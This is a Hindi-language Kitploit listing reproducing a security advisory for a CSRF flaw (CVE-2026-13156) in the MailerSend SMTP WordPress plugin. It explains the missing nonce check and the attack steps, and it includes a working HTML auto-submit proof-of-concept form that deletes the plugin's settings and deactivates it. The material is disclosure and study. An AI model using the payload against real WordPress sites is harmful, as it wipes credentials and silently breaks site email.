Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-13156 — CVE-2026-13156 भेद्यता सलाह एवं PoC — Huynh Kien Minh (MinhHK) द्वारा खोजा गया। | Kitploit
उपकरण/GitHubGitHub/minhhk68/cve-2026-13156
फ़िशिंग उपकरणभेद्यता विश्लेषणशोषणवेब सुरक्षापेपर और शोधलर्निंग और शिक्षा
GitHubminhhk68/cve-2026-13156

CVE-2026-13156

CVE-2026-13156 भेद्यता सलाह एवं PoC — Huynh Kien Minh (MinhHK) द्वारा खोजा गया।

रिपॉजिटरी देखें
212 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-13156 — MailerSend आधिकारिक SMTP एकीकरण < 1.0.8 सेटिंग्स विलोपन और CSRF के माध्यम से प्लगइन निष्क्रियकरण

CVE Identifier CVSS v3.1 Score Discovered By WPScan Verified Advisory CVE-2026-13156 CSRF Attack Chain Infographic


📌 सारांश और त्वरित लिंक

[!IMPORTANT] सारांश: WordPress के लिए आधिकारिक MailerSend SMTP एकीकरण प्लगइन (< 1.0.8) में एक उच्च-गंभीरता वाली क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता (CVE-2026-13156) खोजी गई थी। कॉन्फ़िगरेशन विलोपन हैंडलर mailersend_handle_configuration_delete() प्रशासनिक क्षमताओं (manage_options) की पुष्टि करता है लेकिन WordPress नॉन्स सत्यापन (check_admin_referer()) को पूरी तरह से छोड़ देता है। एक हमलावर एक दुर्भावनापूर्ण क्रॉस-ओरिजिन अनुरोध तैयार कर सकता है जो एक प्रमाणित WordPress व्यवस्थापक को लक्षित करता है ताकि संग्रहीत SMTP क्रेडेंशियल्स को चुपचाप मिटाया जा सके और प्लगइन निष्क्रियकरण को बल दिया जा सके, जिसके परिणामस्वरूप सभी ईमेल वर्कफ़्लो में पूर्ण अनुप्रयोग सेवा अस्वीकृति होती है।

👉 Medium पर पूर्ण गहन तकनीकी लेख पढ़ें: गहन तकनीकी लेख: CVE-2026-13156 या मेरा सुरक्षा पोर्टफोलियो देखें: https://minhhk.web.app/


📋 कार्यकारी सारांश और भेद्यता अवलोकन

  • भेद्यता आईडी: CVE-2026-13156 (WPScan सलाहकार आईडी: 595e653d-0904-43cf-8e61-d684599de11b)
  • प्रभावित सॉफ़्टवेयर: MailerSend – आधिकारिक SMTP एकीकरण (WordPress प्लगइन)
  • प्रभावित संस्करण: संस्करण 1.0.8 से पहले (< 1.0.8)
  • भेद्यता प्रकार: क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF जो सेटिंग्स विलोपन और प्लगइन निष्क्रियकरण की ओर ले जाती है) — CWE-352
  • प्रमुख शोधकर्ता और प्रकटकर्ता: Huynh Kien Minh (उपनाम: MinhHK)
  • भूमिका और संबद्धता: सूचना सुरक्षा छात्र, बग बाउंटी शिकारी, और आक्रामक सुरक्षा शोधकर्ता।

शोधकर्ता के बारे में:
Huynh Kien Minh (Huỳnh Kiến Minh) एक सक्रिय साइबर सुरक्षा शोधकर्ता और भेद्यता विश्लेषक हैं जो गहन सुरक्षा मूल्यांकन और जिम्मेदार प्रकटीकरण के लिए जाने जाते हैं, जिसमें CVE-2026-13156 के तकनीकी विवरण शामिल हैं। उन्हें महत्वपूर्ण सुरक्षा भेद्यताओं को खोजने और प्रकट करने के लिए Proton सुरक्षा हॉल ऑफ फ़ेम पर आधिकारिक रूप से मान्यता और सम्मानित भी किया गया है।


🌐 आधिकारिक सत्यापन केंद्र और संदर्भ

इस तकनीकी सलाह को सत्यापित करने, प्रूफ-ऑफ-कॉन्सेप्ट विश्लेषणों का पता लगाने, या शोधकर्ता से जुड़ने के लिए, देखें:

  • 🏠 आधिकारिक पोर्टफोलियो केंद्र: Huynh Kien Minh सुरक्षा पोर्टफोलियो केंद्र
  • 💼 LinkedIn प्रोफ़ाइल: LinkedIn पर Huynh Kien Minh से जुड़ें
  • 📝 आधिकारिक Medium श्वेतपत्र: गहन तकनीकी लेख: Medium पर CVE-2026-13156
  • 👨‍💻 GitHub प्रोफ़ाइल: MinhHK68 GitHub प्रोफ़ाइल
  • 🔗 WPScan सलाह: CVE-2026-13156 के लिए WPScan प्रविष्टि
  • 🔗 BaseFortify रिपोर्ट: BaseFortify CVE-2026-13156 विश्लेषण

🔍 गहन तकनीकी विवरण और मूल कारण विश्लेषण

1. मूल कारण विश्लेषण (लापता नॉन्स सत्यापन)

WordPress के लिए MailerSend आधिकारिक SMTP एकीकरण प्लगइन (संस्करण 1.0.8 से पहले) एक प्रशासनिक क्रिया (configuration-delete) पंजीकृत करता है जिसका उद्देश्य संग्रहीत API टोकन मिटाना, SMTP कॉन्फ़िगरेशन विकल्पों (wp_options) को साफ़ करना, और व्यवस्थापक डैशबोर्ड से ट्रिगर होने पर प्लगइन को निष्क्रिय करना है।

जबकि एंडपॉइंट यह सत्यापित करता है कि सक्रिय उपयोगकर्ता के पास manage_options क्षमता है (यह सुनिश्चित करते हुए कि अनुरोध एक व्यवस्थापक सत्र से उत्पन्न होता है), यह WordPress नॉन्स (check_admin_referer() या wp_verify_nonce()) सत्यापन करने में विफल रहता है।

क्योंकि नॉन्स सत्यापन की कमी वाले HTTP अनुरोध जानबूझकर किए गए व्यवस्थापक क्लिक और जाली क्रॉस-ओरिजिन अनुरोधों के बीच अंतर नहीं कर सकते हैं, एक प्रमाणित व्यवस्थापक द्वारा लोड की गई कोई भी बाहरी साइट चुपचाप configuration-delete क्रिया को ट्रिगर कर सकती है।

2. हमले का जीवनचक्र और प्रभाव

  1. लक्ष्य पहचान: एक हमलावर MailerSend SMTP (< 1.0.8) का उपयोग करने वाली एक लक्षित WordPress साइट की पहचान करता है।
  2. पेलोड वितरण: हमलावर एक दुर्भावनापूर्ण HTML/JavaScript वेबपेज तैयार करता है जिसमें प्रशासनिक एंडपॉइंट (/wp-admin/admin-post.php या /wp-admin/admin.php?page=mailersend&action=configuration-delete) को लक्षित करने वाला एक स्वचालित-सबमिटिंग फॉर्म होता है।
  3. ट्रिगर: एक लॉग-इन WordPress व्यवस्थापक हमलावर के वेबपेज पर जाता है (जैसे, फ़िशिंग, फ़ोरम लिंक, या बाहरी साइट पर XSS के माध्यम से)।
  4. निष्पादन और सेवा अस्वीकृति: ब्राउज़र व्यवस्थापक के सक्रिय सत्र कुकीज़ के साथ जाली अनुरोध भेजता है। MailerSend प्लगइन विलोपन हैंडलर निष्पादित करता है:
    • सभी संग्रहीत MailerSend SMTP सेटिंग्स और API क्रेडेंशियल्स डेटाबेस से मिटा दिए जाते हैं।
    • MailerSend प्लगइन स्वचालित रूप से निष्क्रिय हो जाता है।
    • महत्वपूर्ण प्रभाव: लक्षित वेबसाइट तुरंत सभी ईमेल भेजने की क्षमताएं खो देती है (पासवर्ड रीसेट, ऑर्डर सूचनाएं, सुरक्षा अलर्ट बिना चेतावनी के विफल हो जाते हैं)।

💻 प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण कोड

[!WARNING] नैतिक अस्वीकरण: निम्नलिखित HTML क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) प्रूफ-ऑफ-कॉन्सेप्ट पेलोड केवल शैक्षिक उद्देश्यों, रक्षात्मक सत्यापन, और Huynh Kien Minh द्वारा नैतिक प्रकटीकरण प्रोटोकॉल के तहत सुरक्षा ऑडिटिंग के लिए प्रदान किया गया है। अनधिकृत लक्ष्यों के विरुद्ध निष्पादित न करें।

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
    <!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
    <h2>CVE-2026-13156 — CSRF Verification PoC</h2>
    <p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
    
    <!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
    <form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
        <input type="hidden" name="page" value="mailersend-smtp" />
        <input type="hidden" name="action" value="configuration-delete" />
        <!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
        <input type="submit" value="Execute PoC (Simulate Attack)" />
    </form>

    <script>
        // Automatically submit the forged request when the administrator loads the page
        document.addEventListener("DOMContentLoaded", function() {
            console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
            // Uncomment line below to enable auto-execution in lab environments:
            // document.getElementById('csrfPoC').submit();
        });
    </script>
</body>
</html>

🛡️ उपचार और पैच विश्लेषण

टूल डाउनलोड करें